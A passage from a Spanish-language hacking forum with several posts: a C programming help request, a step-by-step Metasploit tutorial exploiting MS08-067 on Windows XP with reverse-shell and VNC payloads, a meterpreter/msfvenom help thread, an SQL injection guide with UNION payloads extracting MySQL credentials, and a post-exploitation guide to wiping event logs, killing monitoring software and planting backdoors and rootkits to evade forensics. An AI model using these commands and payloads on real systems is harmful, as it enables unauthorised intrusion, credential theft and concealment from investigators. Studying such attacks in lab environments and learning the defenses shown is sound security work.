for(i=0; i<num; i++){
   vectorNumeros=i+1;
}
for(i=0; i<mitad; i++){
   vectorUno=vectorNumeros;
   vectorDos=vectorNumeros[i+mitad] ;
}
intercambio(mitad,  vectorUno[mitad], vectorDos[mitad]);
imprimir( mitad,  vectorUno[mitad],  vectorDos[mitad]);
printf("\n");
}
void intercambio(int mitad, int vectorUno[mitad], int vectorDos[mitad]){
int i,auxUno,auxDos;
    for(i=0; i<mitad; i++){
       auxUno=vectorUno;
       auxDos=vectorDos;
       vectorUno=auxUno;
       vectorDos=auxDos;
    }
}
void imprimir(int mitad, int vectorUno[mitad], int vectorDos[mitad]){
int i;
   for(i=0; i<mitad; i++){
      printf("[%d",vectorUno);
      printf("] vs [");
      printf("%d]",vectorDos);
      printf("\n");
   }
}
#68
Buenas, esta vez estoy haciendo un ejercicio en C que saque las raices de una ecuación de segundo grado mediante el método de rufini. Aquí les dejo el codigo:

#include <stdio.h>
#include <stdlib.h>
#include <math.h>

int main ()
{
    int a, b, c;
    int i, j, r1, r2;
   
    printf("Ingrese los coeficientes de la ecuacion para mostrar sus raices");
    printf("\nIngrese el primer coeficiente: ");
    scanf("%d", &a);
    printf("\nIngrese el segundo coeficiente: ");
    scanf("%d", &b);
    printf("\nIngrese el tercer coeficiente: ");
    scanf("%d", &c);
   
    /*
     * El primer for que va ascenso
     * */
   
    for(i= 1 ; i==1 ; i++){
       /* Primera operacion
        * de la regla de rufini
        * */
            r1= i*a + b;
            b= r1;
            r1= b*i + c;
           
            if(r1 == 0){
            c= 0;
             r1= i;
                printf("\nLa primera raiz es: %d", r1);
                }
         /*
          * Segunda operación
          * de la regla de rufini.
          * */       
            r2= i * a;
            r2= r2 + b;
           
            if(r2 == 0){
            b= 0;
            r2= i;
            printf("\nLa segunda raiz es: %d", r2);
            }
         
      }

/*
* El segundo for que va en descenso
* */

     for(j= -1 ; j== -1 ; j--){
       /* Primera operacion
        * de la regla de rufini
        * */
            r1= j*a + b;
            b= r1;
            r1= b*j + c;
           
            if(r1 == 0){
            c= 0;
            r1= j;
                printf("\nLa primera raiz es: %d", r1);
                }
         /*
          * Segunda operación
          * de la regla de rufini.
          * */       
            r2= j*a;
            r2= r2 + b;
           
            if(r2 == 0){
            b= 0;
            r2= j;
            printf("\nLa segunda raiz es: %d", r2);
            }
            
      }
           
   
    return 0;
}

He estado casi obsesionado con hacerlo de esta manera y lo e modificado bastante. Lo que quiero hacer con los dos for es que vayan buscando números positivos y negativos hasta que consigan uno con el cual se cumplan las condiciones del if. El primer for va a buscar números positivos en orden ascendente, es decir que irá sumando de uno en uno e valor de la "i", a su vez cada valor de la "i" se irá multiplicando o sumando con los coeficientes que el usuario haya ingresado hasta que llegue al if, y si el resultado de la ultima suma es cero entonces quiere decir que el ultimo valor que tomó i es la primera raíz de la ecuación.

Si el primer for no encontró las raíces en numero positivos, entonces que pase al siguiente for y busque en los numero s negativos, es decir que en este for la j va en descenso. Este for solo buscará número negativos, es decir desde el -1 hacia la izquierda.

Bueno lo que sucede es que cuando compilo el programa e introduzco los coeficientes 1, 2 y 1 que corresponde a la ecuación: Ax^2 + Bx + C= 0 (A= 1, B= 2 y C= 1), entonces no me da ninguna raíz, como si los bucles no estuvieran trabajando. Cuando en realidad las raíces de esta ecuación son -1 y -1 sacandolas por el método de ruffini.
#69
en este tutorial explicare como acceder a una PC con Windows XP (sin sus actualizaciones de seguridad) utilizando Metasploit en BackTrack 5 y el famoso exploit Netapi.
La idea de este tutorial es que sepan lo vulnerable que es un sistema sin descargar las actualizaciones.

Requisitos para este tutorial:
- La PC a la que vamos a acceder debe tener Windows XP, SP1, SP2 o SP3, Windows 2000 o 2003. Y no debe tener los parches de seguridad. Tambien recomendaria desactivar firewalls y antivirus para evitar problemas.
- Para simplificar el tutorial supondremos que la PC a atacar esta en la misma red que la PC Atacante. El exploit tambien funciona con PCs que no esten en la misma red, solo que hay que tener en cuenta otras variables, como el router y el firewall, que no se tendran en cuenta en este tutorial.
- Usare como SO atacante BackTrack 5 que ya viene con todas las herramientas, pueden descargar la iso desde la pagina oficial --> http://www.backtrack-linux.org/downloads/
Despues que descargaron la iso la guardan en un CD/DVD y arrancan el Sistema operativo desde el CD/DVD, o si no pueden usar una maquina virtual como vmware, o virtual box y arrancar el sistema operativo desde la iso. No detallare esto ya que hay mucha informacion en internet de como iniciar Backtrack 5 desde un CD.

Comenzamos...

1- Comenzamos obteniendo nuestra ip local para saber donde estamos ubicados en la red. Para ello ya dentro de BackTrack Abrimos una Terminal (Ctrl+Alt+T) y escribimos:

Código: [Seleccionar]
ifconfig



Como podemos ver nuestra IP local es 10.0.0.3, podria ser otra del tipo 192.168.X.X o de otro tipo. Apuntamos esta direccion porque nos servira mas adelante.

2- Escaneamos la red con nmap para obtener la direccion IP de los posibles objetivos. Como nuestra IP local es 10.0.0.3, buscaremos objetivos entre el rango 10.0.0.1 y 10.0.0.30, para ello escribimos lo siguiente

Código: [Seleccionar]
nmap -sS -O [Rango de IP]

Ejemplo: nmap -sS -O 10.0.0.1-30
Ejemplo2: nmap -sS -O 192.168.1.1-255

http://i49.servimg.com/u/f49/17/29/41/45/dibujo10.jpg

Como podemos ver tenemos una PC con Linux (que no es vulnerable al ataque) y otra con Windows XP, 2000 o 2003 que posiblemente es vulnerable al ataque. Y su IP es 10.0.0.4. Apuntaremos esta IP para usarla despues.
Si ya tenemos la IP del objetivo no es necesario hacer este paso asi que simplemente lo saltean.

3- Ya sabemos nuestra IP y la IP del objetivo asi que ahora procederemos al ataque.
Abrimos Metasploit escribiendo en la terminal:

Código: [Seleccionar]
msfconsole




4- Sleccionaremos el exploit Netapi escribiendo lo siguiente:

Código: [Seleccionar]
use exploit/windows/smb/ms08_067_netapi

5- Seteamos como objetivo a la IP de la PC con windows XP:

Código: [Seleccionar]
set RHOST [IP Objetivo]

Ejemplo: set RHOST 10.0.0.4

6- Ahora cargaremos el Payload. En este tutorial mostrare 2 tipos de Payload diferentes, "windows/shell/reverse_tcp" y "windows/vncinject/reverse_tcp"

"windows/shell/reverse_tcp" es una shell remota, se usa cuando se necesita discrecion. El usuario de la PC objetivo no notara que estamos controlando su PC.

Cargamos escribiendo lo siguiente:

set PAYLOAD windows/shell/reverse_tcp

7- Seteamos con nuestra IP local:

Código: [Seleccionar]
set LHOST [IP Local]

Ejemplo: set LHOST 10.0.0.3


8- Enviamos el exploit:
Código: [Seleccionar]
exploit



Y listo! Acceso concedido, ya tenemos una shell remota de la PC con windows XP! Con esta shell tenemos acceso total.

Ahora como otra alternativa usaremos el Payload de VNC "windows/vncinject/reverse_tcp", este Payload permite ver el escritorio remoto. No es nada discreto.

Ahora podemos seguir a partir del punto 5, o seguir desde el punto 8. Es lo mismo.

9- Presionamos (Ctrl+C) para cerrar la conexion de la shell.

10- Cargamos el Payload escribiendo:

Código: [Seleccionar]
set PAYLOAD windows/vncinject/reverse_tcp

11- Seteamos con nuestra IP local:

Código: [Seleccionar]
set LHOST [IP local]
Ejemplo: set LHOST 10.0.0.3

12- Enviamos el exploit escribiendo:

Código: [Seleccionar]
exploit




Y listo ya tenemos acceso remoto a la PC con windows XP mediante VNC!

Resumen de los comandos utilizados:

Tomando como ejemplo las siguientes IPs:
IP de nuestra pc (BackTrack): 10.0.0.3
IP de la PC objetivo (Windows XP): 10.0.0.4


Código: [Seleccionar]
msfconsole
ifconfig
nmap -sS -O 10.0.0.1-255
use exploit/windows/smb/ms08_067_netapi
set RHOST 10.0.0.4
set PAYLOAD windows/shell/reverse_tcp
set LHOST 10.0.0.3
exploit


Como pueden ver son muy pocos los comandos utilizados, por lo que a una persona con conocimientos basicos de Metasploit se le hace muy facil acceder a una PC con windows XP sin los parches de seguridad.

Se recomienda actualizar windows XP para evitar este tipo de ataques.

espero les ayude meramente infomativo. para ser probado virtualmente.
disculpen por las imágenes aun no me familiarizo en colocar fotos xD
#70
Hacking / ayuda con metasploit
30 Diciembre 2013, 15:50 PM
Ola amigos del foro tengo unas dudas q espero puedan ayudarme, estoy tratando de hacer pruebas de penetracion con metasploit y meterpreter pero obviamente algo estoy haciendo mal o algun concepto no lo manejo del todo. bueno comienzo, realizo las pruebas en vmware maquina 1 Kali y maquina 2 win xp sp3 (sin nada instalado). la configuracion de kali es eth0 conexión NAT (para tener acceso a intertet) y eth1 conexión host-only. Para win xp tengo conexión host-only, bueno al realizar Nmap genera lo siguiente:




Starting Nmap 6.40 ( http://nmap.org ) at 2013-10-28 05:03 CLST
NSE: Loaded 23 scripts for scanning.
Initiating ARP Ping Scan at 05:03
Scanning 192.168.XX.XXX [1 port]
Completed ARP Ping Scan at 05:03, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 05:03
Completed Parallel DNS resolution of 1 host. at 05:03, 13.01s elapsed
Initiating SYN Stealth Scan at 05:03
Scanning 192.168.XX.XXX [1000 ports]
Discovered open port 139/tcp on 192.168.XX.XXX
Discovered open port 3389/tcp on 192.168.XX.XXX
Discovered open port 135/tcp on 192.168.XX.XXX
Completed SYN Stealth Scan at 05:03, 1.22s elapsed (1000 total ports)
Initiating Service scan at 05:03
Scanning 3 services on 192.168.XX.XXX
Completed Service scan at 05:03, 6.08s elapsed (3 services on 1 host)
NSE: Script scanning 192.168.XX.XXX
NSE: Starting runlevel 1 (of 1) scan.
Nmap scan report for 192.168.XX.XXX
Host is up (0.00024s latency).
Scanned at 2013-10-28 05:03:20 CLST for 20s
Not shown: 997 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn
3389/tcp open  ms-wbt-server Microsoft Terminal Service
MAC Address: 00:0C:29:XX:XX:XX (VMware)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.56 seconds
           Raw packets sent: 1068 (46.976KB) | Rcvd: 1001 (40.040KB)



en Nesus:



high
MS12-020: Vulnerabilities in Remote Desktop Could Allow Remo...
Windows
1
medium
Microsoft Windows Remote Desktop Protocol Server Man-in-the-...
Windows
1
medium
Terminal Services Encryption Level is Medium or Low
Misc.
1
low
Terminal Services Encryption Level is not FIPS-140 Compliant...
Misc.
1



Ahora intente realizar un meterpreter según un tutorial realizado por Sanko, realice msfvenom con el payload shell_bind_tcp,
quedando algo asi:

msfvenom --payload windows/shell_bind_tcp LPORT=1337 C --encoder x86/shikata_ga_nai --iterations 6 --bad-chars '\x00'

con este shellcode genere un .exe y lo ejecute en la maquina de win xp, lo cual queda como en la imagen:






Si se fijan queda 0.0.0.0 1337, bueno el problema que cuando quiero llamar con handlen no conecta:



use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.XX.XXX
set LPORT 1337
exploit


Bueno aca van las preguntas:

1.- Con los puertos abiertos que da Nmap y las vulnerabilidades de Nessus que payload puedo ocupar para generar una conexion meterpreter??

2.- Con el shell_bind_tcp LPORT=1337, LPORT es mi puerto abierto, osea el de la maquina virtual de Kali como puedo verificar q ese puerto esta abierto, lo tengo q abrir o como puedo abrir un puerto en una maquina virtual???

3.- En las maquinas virtuales tengo q tener abierto los puertos (ya sea RPORT y LPORT) para hacer pruebas de penetración??

4.- Como puedo hacer conexión meterpreter con la información entregada???


Bueno espero puedan ayudarme y gracias de ante mano... Saludos!!!
#71
http://www.hackertest.net/
probad tus habilidades como hacker y postea a que nivel llegas seguida de una screen shot
saludos  ::)
#72
Hacking / Guia de Inyecciones SQL.
30 Diciembre 2013, 14:58 PM
Introducción a los ataques SQL Injection
Deja un comentario

Para explicar las inyecciones SQL voy a presuponer que se tienen ciertos conocimientos de desarrollo de aplicaciones web utilizando un lenguaje del lado del servidor como PHP, así como el uso de SQL para realizar consultas a una base de datos MySQL. En primer lugar veremos una explicación teórica sobre los ataques SQL Injection. Después un ejemplo práctico de como aprovecharse de esta vulnerabilidad para extraer información de la base de datos y por último veremos como podemos proteger nuestras aplicaciones de este tipo de ataques.

Teoría sobre los ataques SQL Injection

Los ataques SQL Injection explotan una vulnerabilidad en la validación de las entradas a la base de datos de una aplicación. Una inyección SQL consiste en inyectar un código SQL invasor dentro de otro código SQL para alterar su funcionamiento normal haciendo que se ejecute el código invasor en la base de datos.

La mayoría de aplicaciones webs consisten en un conjunto de operaciones con la base de datos, por ejemplo, en un foro para crear nuevos comentarios se insertan registros en la base de datos y para listar las entradas se seleccionan registros en la base de datos. Estas operaciones reciben el nombre de CRUD (Create, Retrieve, Update y Delete). Las aplicaciones son un conjunto de módulos separados que interaccionan entre sí a través de los enlaces y los formularios. Por lo tanto es normal que el desarrollador enlace las distintas páginas utilizando variables que después utilizará para hacer las consultas pertinentes a la base de datos.

Vamos a ver un ejemplo teórico para que quede claro como funcionan la mayoría de las aplicaciones web. Imaginaros que entrais al índice principal de un foro donde podeís ver cada categoría. Si quereis ver las entradas de cierta categoría pulsareis sobre el enlace y os mostrará las primeras entradas paginadas.

La URL del enlace podría ser algo así (es ficticia, no entreis):

http://www.miforoinventado.com/viewforum.php?cat=3
Internamente el desarrollador realizará una consulta a la tabla de entradas y seleccionará aquellas cuya categoría tenga un id igual a tres. La consulta podría ser algo así:

$consulta = 'SELECT * FROM entrada
            WHERE entrada.id_categoria = '.$_GET['cat'].
           ' ORDER BY entrada.fecha ASC
            LIMIT 1,10';
Esta consulta es vulnerable a ataques SQL Injection. El desarrollador está presuponiendo que nadie va a alterar los datos de entrada de la variable cat y la utiliza en la consulta sin haber pasado antes algunos filtros para evitar las inyecciones SQL. Por lo que podemos decir que este tipo de vulnerabilidad está presente en aquellas consultas que confían en los datos de entrada del usuario y como ya hemos dicho muchísimas veces, una regla fundamental del desarrollo de aplicaciones web es nunca confiar en las entradas de los datos del usuario, ya que podrían verse alteradas, ya sea porque el usuario es un cracker que se quiere divertir o porque el gato del usuario se aburre y se ha puesto a caminar por encima del teclado.

Ejemplo práctico de ataque SQL Injection

Vamos a ver un ejemplo sencillo para practicar las inyecciones SQL. Antes de empezar con los ataques SQL Injection, nos preparamos un entorno seguro de pruebas:

1. Conectamos el servidor web Apache y el servidor MySQL.

2. Creamos una base de datos llamada inyeccion.

CREATE DATABASE inyeccion;

USE inyeccion;
3. Creamos una tabla usuario donde se almacenarán los nombres de usuario con las contraseñas de todos los usuarios que utilizen nuestra aplicación.

CREATE TABLE usuario
(
 id INT(15) UNSIGNED NOT NULL AUTO_INCREMENT PRIMARY KEY,
 login VARCHAR(30) NOT NULL,
 password VARCHAR(50) NOT NULL,
 email VARCHAR(50) NOT NULL
);
4. Rellenamos la tabla con datos de prueba.

INSERT INTO usuario
VALUES (NULL, 'francisco', 'password_francisco', 'email_francisco'),
(NULL, 'jose', 'password_jose', 'email_jose'),
(NULL, 'julia', 'password_julia', 'email_julia'),
(NULL, 'estefania', 'password_estefania', 'email_estefania'),
(NULL, 'pablo', 'password_pablo', 'email_pablo');
5. Desarrollamos un script PHP de prueba para inyecciones. Algo sencillo, por ejemplo, un formulario de inicio de sesión que le pida al usuario su id y le muestre al usuario la información que la aplicación dispone de él, es decir, su id, su login y su email.

<html>
<head>
 <title>SQL Injection</title>
</head>
<body>

 <form action="inyecciones.php" method="get">
    <label for="id">ID: </label>
    <input type="text" id="id" name="id" />
    <input type="submit" value="Iniciar" />
 </form>

<?php
if( isset($_GET['id']) )
{
 $id    = $_GET['id'];

 $mysqli = new mysqli('localhost', 'root', '');

 $mysqli->select_db('inyeccion');

 $consulta = 'SELECT * FROM usuario WHERE id='.$id;

 echo $consulta.'<br />';

 $resultado = $mysqli->query($consulta);

 $usuario = $resultado->fetch_row();
 echo 'DATOS DEL USUARIO: <br />';
 echo 'ID: '.$usuario[0].'<br />';
 echo 'LOGIN: '.$usuario[1].'<br />';
 echo 'EMAIL: '.$usuario[3].'<br />';

 $resultado->free();

 $mysqli->close();
}
?>
</body>
</html>
Como nosotros hemos sido los que hemos desarrollado el código de prueba sabemos que la consulta es vulnerable a inyecciones SQL porque no filtra los datos de entrada. Lo normal es no disponer del código y realizar inyecciones a ciegas, lo que se conoce como Blind SQL Injection.

Antes de nada vamos a ver como funciona nuestro pequeño script accediendo a él desde el navegador:

Introducimos algunos datos de prueba:



Pulsamos el botón Iniciar y vemos que nos muestra de nuevo el formulario para seguir haciendo pruebas, la consulta que se ha ejecutado en el servidor MySQL y los datos que ha recuperado esa consulta, el id, el login y el email:



Fijaros atentamente en la barra de dirección del navegador que es desde donde vamos a realizar las inyecciones, en nuestro ejemplo también podríamos inyectar desde el formulario porque estamos utilizando el método GET de HTTP para pasar los datos al servidor.

http://localhost/pruebas/inyecciones.php?id=1
Comprobando si la aplicación es vulnerable a SQL Injection:
Para comprobar si la aplicación es vulnerable a SQL Injection lo normal es probar alguna inyección SQL básica para ver lo que sucede.

http://localhost/pruebas/inyecciones.php?id=1 and 1=1 --

SELECT * FROM usuario WHERE id=1 and 1=1 --
DATOS DEL USUARIO:
ID: 1
LOGIN: francisco
EMAIL: email_francisco
Como podemos observar hemos inyectado nuestro primer código SQL en la consulta y nada ha cambiado, sigue funcionando de la misma manera. Sino fuera porque mostramos la consulta que se ejecuta en el servidor todavía no sabríamos si la aplicación es vulnerable dado que sigue funcionando de la misma forma. Esto es así porque simplemente hemos añadido una condición a la selección que siempre se va a cumplir, puesto que uno es igual a uno. Los dos guiones se utilizan para comentar todo lo que venga después de la consulta.

Para comprobar si es vulnerable añadimos una condición que nunca se cumple y vemos que es lo que sucede.

http://localhost/pruebas/inyecciones.php?id=1 and 1=0 --

SELECT * FROM usuario WHERE id=1 and 1=0 --
DATOS DEL USUARIO:
ID:
LOGIN:
EMAIL:
¡EUREKA! Tenemos una aplicación vulnerable a SQL Injection, aunque ya lo sabíamos desde un principio. Vemos que al añadir una condición que nunca se va a cumplir, puesto que uno nunca va a ser igual a cero, la consulta no devuelve ningún registro y no muestra ningún dato por pantalla.

Extrayendo datos:
Ya sabemos que nuestra aplicación es vulnerable a las inyecciones SQL. En primer lugar vamos a extraer el número de columnas que tiene la tabla usuario. Para poder saber el número de columnas vamos a jugar con la opción ORDER BY de la sentencia SELECT. La cuestión es que si intentamos ordenar los registros que seleccionamos por un número mayor de las columnas que tengamos la consulta no devolverá ningún registro dado que se producirá un error fatal y se abortará la ejecución del script.

http://localhost/pruebas/inyecciones.php?id=1 order by 1 --

SELECT * FROM usuario WHERE id=1 order by 1 --
DATOS DEL USUARIO:
ID: 1
LOGIN: francisco
EMAIL: email_francisco

http://localhost/pruebas/inyecciones.php?id=1 order by 2 --

SELECT * FROM usuario WHERE id=1 order by 2 --
DATOS DEL USUARIO:
ID: 1
LOGIN: francisco
EMAIL: email_francisco

http://localhost/pruebas/inyecciones.php?id=1 order by 3 --

SELECT * FROM usuario WHERE id=1 order by 3 --
DATOS DEL USUARIO:
ID: 1
LOGIN: francisco
EMAIL: email_francisco

http://localhost/pruebas/inyecciones.php?id=1 order by 4 --

SELECT * FROM usuario WHERE id=1 order by 4 --
DATOS DEL USUARIO:
ID: 1
LOGIN: francisco
EMAIL: email_francisco

http://localhost/pruebas/inyecciones.php?id=1 order by 5 --

SELECT * FROM usuario WHERE id=1 order by 5 --

Fatal error: Call to a member function fetch_row() on a
non-object in C:\wamp\www\pruebas\inyecciones.php on line 28
Hemos descubierto que la tabla usuario (aunque nosotros no sabemos todavía que la tabla se llama usuario) tiene 4 columnas, puesto que con ORDER BY 5 se produce un error fatal. He activado la directiva display_errors en la configuración de PHP para que muestre los errores fatales que se producen.

Obteniendo información del servidor:
Antes de comenzar a extraer información del servidor MySQl tenemos que explicar la sentencia UNION para unir consultas. Nuestro script está programado para ejecutar las sentencias SQL de una en una, es decir, no podemos ejecutar múltiples sentencias a la vez, por eso nos valemos de la sentencia UNION que se encarga de unir los resultados de dos o más consultas. Solo hay un inconveniente, que todas las sentencias SELECT que unamos con UNION deben de utilizar el mismo número de columnas, por eso hemos extraído el número de columnas anteriormente.

http://localhost/pruebas/inyecciones.php?id=-1 UNION SELECT 1,2,3,4

SELECT * FROM usuario WHERE id=-1 UNION SELECT 1,2,3,4
DATOS DEL USUARIO:
ID: 1
LOGIN: 2
EMAIL: 4
Qué estamos haciendo? Hemos unido dos consultas, una que no devuelve ningún dato porque no existe ningún usuario con identificador negativo, y una consulta que devuelve un 1, un 2, un 3 y un 4. De esta forma vemos como se muestran los datos de la segunda consulta, en concreto, se muestra un 1, un 2 y un 4. Ahora podremos sustituir esos tres números en nuestra consulta para extraer información del servidor MySQL.

Podemos utilizar algunas funciones para extraer información:
- user(): Devuelve el usuario de la base de datos.
- version(): Devuelve la versión del servidor MySQL.
- database(): Devuelve el nombre de la base de datos actual.
- current_user(): Devuelve el nombre de usuario y el del host para el que está autenticada la conexión.
- last_insert_id(): Devuelve el último valor generado automáticamente que fue insertado en una columna AUTO_INCREMENT.
- connection_id(): Devuelve el ID de una conexion.

http://localhost/pruebas/inyecciones.php?id=-1 UNION  user(),database(),3,version()

SELECT * FROM usuario WHERE id=-1 UNION SELECT user(),database(),3,version()
DATOS DEL USUARIO:
ID: root@localhost
LOGIN: inyeccion
EMAIL: 5.1.36-community-log
Ya tenemos el usuario que estamos utilizando para acceder a la base de datos, y mira que suerte, es root, así que seguramente tengamos todos los privilegios asignados para hacer todo lo que queramos. También tenemos el nombre de la base de datos, inyeccion, y además la versión MySQL que estamos utilizando 5.1.36-community-log. Con todos estos datos ya podríamos empezar a hacer cosas interesantes, pero no va de eso este artículo.

Sigamos extrayendo informacion.

http://localhost/pruebas/inyecciones.php?id=-1 UNION SELECT current_user(),last_insert_id(),3,connection_id()

SELECT * FROM usuario WHERE id=-1 UNION SELECT current_user(),last_insert_id(),3,connection_id()
DATOS DEL USUARIO:
ID: root@localhost
LOGIN: 0
EMAIL: 44
Lo normal cuando encontramos una vulnerabilidad de este estilo es extraer un usuario y una contraseña para acceder remotamente al servidor y ya desde un entorno más sencillo, como una línea de comandos, obtener toda la información que queramos.

MySQL cuenta con una base de datos interna llamada mysql. Dentro de esta base de datos almacena los usuarios y las contraseñas en una tabla llamada users. Por lo tanto podemos obtener esta información inyectando una sentencia SQL:

http://localhost/pruebas/inyecciones.php?id=-1 UNION select host, user, 3, password from mysql.user

SELECT * FROM usuario WHERE id=-1 UNION select host, user, 3, password from mysql.user
DATOS DEL USUARIO:
ID: localhost
LOGIN: root
EMAIL:
Vemos que el usuario es root, el servidor está en localhost dado que está en mi ordenador, pero aquí obtendríais la dirección ip o el nombre de dominio donde estuviera alojado el servidor, y por último que no tiene contraseña. ¡VAYA SEGURIDAD! Si tuviera contraseña os daría un hash que tendrías que crackear utilizando por ejemplo el John The Ripper.

Ahora podemos conectarnos recomtamente en el puerto 3306 que es el que suele usar MySQL por defecto y obtener todos los datos que queramos. Si no podemos acceder remotamente desde la línea de comandos podemos seguir extrayendo información mediante inyecciones haciendo uso de las tablas mysql e information_schema.

Protegiendo nuestras aplicaciones de ataques SQL Injection:

Este tipo de vulnerabilidades son muy peligrosas y hay que aprender a protegerse de ellas. Hay muchos trucos para ponérselo más difícil a los atacantes. Una de las mejores soluciones es utilizar la función mysql_real_escape_string() que se encarga de escapar los caracteres especiales utilizados en las consultas SQL, o utilizar el método real_escape_string() si utilizamos la versión orientada a objetos.

Podemos utilizar este método para escapar los strings que se pasen a las consultas SQL pero si utilizamos datos numéricos en vez de cadenas podemos comprobar que el dato de entrada es un número entero o es un número decimal, ya sea mediante las funciones is_int() o is_float() o realizando castings (int), (float).

Vamos a ver un ejemplo de consulta SQL que no es vulnerable a inyecciones SQL:

$consulta= 'SELECT *
FROM categoria
WHERE id_categoria=\''.(int)$_GET['id'].'\'';

$consulta= 'SELECT *
FROM categoria
WHERE titulo=\''.mysql_real_escape_string($_GET['titulo']).'\';
De esta forma protegemos nuestras aplicaciones de todo tipo de inyecciones SQL.

RESUMEN:

EN este artículo hemos visto que peligroso puede ser este tipo de vulnerabilidades en nuestras aplicaciones ya que mediante inyecciones SQL pueden obtener todos los datos que quieran de nuestra base de datos, incluso de ficheros alojados en el servidor. Hemos practicado un poco con un ejemplo muy sencillo. Podéis seguir practicando con el mismo ejemplo y extraer todos los datos que querais de las tablas mysql e information_schema, desde el nombre de todas las tablas de la base de datos, nombres de las columnas, registros de las tablas, etc.

espero les sirva de ayuda: Att: Nightcode ::)
#73
Hacking / Pregunta Sobre maquina virtual
30 Diciembre 2013, 13:04 PM
Saludos amigos hacker del foro hacker. no se bien como formular esta pregunta pero lo intentare. quiero probar diferentes ataques utilizando una maquina virtual de pruebas para no causar ningun daño y asi aprender un poco mas y aumentar el conocimiento ya que la practica hace al maestro (hacker). lo que quiero preguntar en si es
1) cual es la mejor maquina virtual para esto? y la mas sencilla de usar?
2) a la hora de instalarla solo la instalo ejecuto el windows virtual que voy a vulnerar ya sea 7 xp o el mas basico.
3)  como pregunta final el programa para realizar ataque ejemplo metasploit lo instalo e my windows original (no virtual) y de hay realizo los ataques a la maquina virtual? cierto?
gracias espero sus respuestas y ayudas :) por favor  :D
#74
aquí dejo mi guia de como borrar huellas digitales luego de una Induccion  a un sistema operativo ya sea con backtrack o con otro programa:

Tras realizar un acceso no deseado a un equipo con Windows y tras garantizarnos próximos acceso a dicho sistema, la idea es dejar el mínimo rastro posible. Esta es una de las tareas más importantes en la post-explotación, la ocultación. Windows guarda una especie de log's o registros del sistema para poder saber qué es lo que está pasando, así que una de las formas más sencillas de poder ocultar el acceso, es lógicamente borrarlos. Por suerte, metasploit en meterpreter trae consigo un par de componentes que ayudan a realizar esta tarea. El primero es el uso del modo incógnito, que lo que hace es intentar ocultar todo lo posible todas aquellas tareas que se hagan en el sistema, así como la presencia de un "no deseado" en el mismo.
meterpreter> load incognito
Otra de las formas que hay es borrar los registros que hemos mencionado. Esto es lo mejor que se puede realizar justo antes de abandonar el equipo, para borrar rastro creado en los mismos. Se borrará todo el contenido de los registros.
meterpreter> clearev
  • Wiping 88 records from Application...
  • Wiping 136 records from System...
  • Wiping 0 records from Security...





       Una vez hemos conseguido penetrar en un sistema, la serie de actividades que se deben realizar son vitales para evitar ser descubiertos y garantizar futuros accesos a la maquina comprometida, aunque no hay una metodología estándar para este tipo de actividades, existen un conjunto de pasos que son ampliamente aceptados dada su importancia en el proceso de post-explotacion de un sistema.
    1. Entendimiento de la víctima (Information Gathering):
    El primer paso que se debe realizar una vez explotada una vulnerabilidad, consiste en recolectar la mayor cantidad de información posible sobre el sistema objetivo, de esta forma podemos determinar estrategias y planes de acción que servirán de insumo a los pasos subsecuentes.
    Algunos tópicos de interés sobre el sistema objetivo pueden ser:
    •   Sistema Operativo del Objetivo y el nivel de parche aplicado
    •   Características de Hardware del objetivo y determinar si se encuentra ejecutandose sobre una maquina virtual o no.
    •   Listado de Usuarios registrados en el sistema y cuales se encuentran logueados actualmente.
    •   Listado de Procesos en Ejecución
    •   Programas instalados en la maquina objetivo y frecuencia de uso
    •   Tiempo de Actividad/Inactividad del Sistema objetivo.
    •   Dependiendo del sistema operativo instalado en el objetivo, verificación de ficheros de configuración en busca de posibles vulnerabilidades para seguir explotando.
    •   Listado de variables de entorno en el sistema objetivo.
    •   Obtención de los hashes correspondientes a los passwords de los usuarios del sistema objetivo.
    •   Determinar si se tiene acceso a otras maquinas en el segmento de red y si existen directorios compartidos.
    •   Encontrar software de Seguridad instalado en la máquina y ficheros de log del sistema
    2. Escalación de Privilegios (Privilege Escalation)
    Frecuentemente, nos encontramos que una vez comprometido un sistema, no tenemos un usuario con los permisos suficientes para desarrollar determinadas actividades sobre el sistema objetivo, en estos casos, se hace necesario realizar un procedimiento de escalacion de privilegios para obtener de este modo una cuenta de usuario con todos los privilegios habilitados sobre el sistema, así tendremos muchas mas facilidades a la hora de tratar la maquina comprometida como pivote para comprometer otra maquina en el segmento de red y finalmente comprometer la red completa.
    3. Borrar Logs y matar procesos de software de monitoreo
    Este punto, es quizás el mas importante debido que puede perjudicar nuestro acceso y ponernos al descubierto, cualquier tipo de rastro que se deje en una maquina objetivo puede ser posteriormente utilizado en un análisis forense y con esto cerrar definitivamente nuestras alternativas de acceso a la maquina comprometida, en muchos casos también conlleva a acciones legales que evidentemente serán indeseables.
    Por otro lado, también existe la posibilidad (muy probable) que la maquina objetivo tenga instalado algún tipo de software dedicado a la seguridad e integridad del sistema, en muchos casos este será nuestro principal problema a la hora de ejecutar determinadas acciones sobre el sistema remoto, por esta razón es indispensable dedicar tiempo y energía en investigar el sistema y los posibles sistemas de monitoreo instalados en el objetivo detectar el software instalado y sus correspondientes versiones
    4. Recolectar información, Ejecutar programas en la víctima, etc.
    Llegados a este punto, es importante obtener información mas detallada sobre la víctima y ejecutar programas en el objetivo que puedan alterar variables del registro del sistema operativo o alguna utilidad que nos permita crackear información cifrada como ficheros de passwords, etc. Este paso nos permitirá acceder a cierta información que puede resultar invaluable para permitirnos el acceso a la maquina comprometida en cualquier momento y seguramente, nos permitirá optimizar este proceso sin ser detectados por los sistemas de seguridad instalados en la maquina objetivo.
    5. Establecer puertas Traseras, Rootkits
    Finalmente, el ultimo punto para tener completamente a nuestra disposicion una maquina remota, es establecer puertas traseras y rootkits, con el fin de garantizar nuestro acceso en el caso de ser descubiertos por la maquina remota de esta forma, aunque nos cierren una ruta de entrada, tendremos a nuestra disposición otros mecanismos que nos permitirán acceder a la maquina objetivo nuevamente y realizar cualquier tipo de acción.
    6. Usar la víctima como pivote para hackear otras maquinas en la red
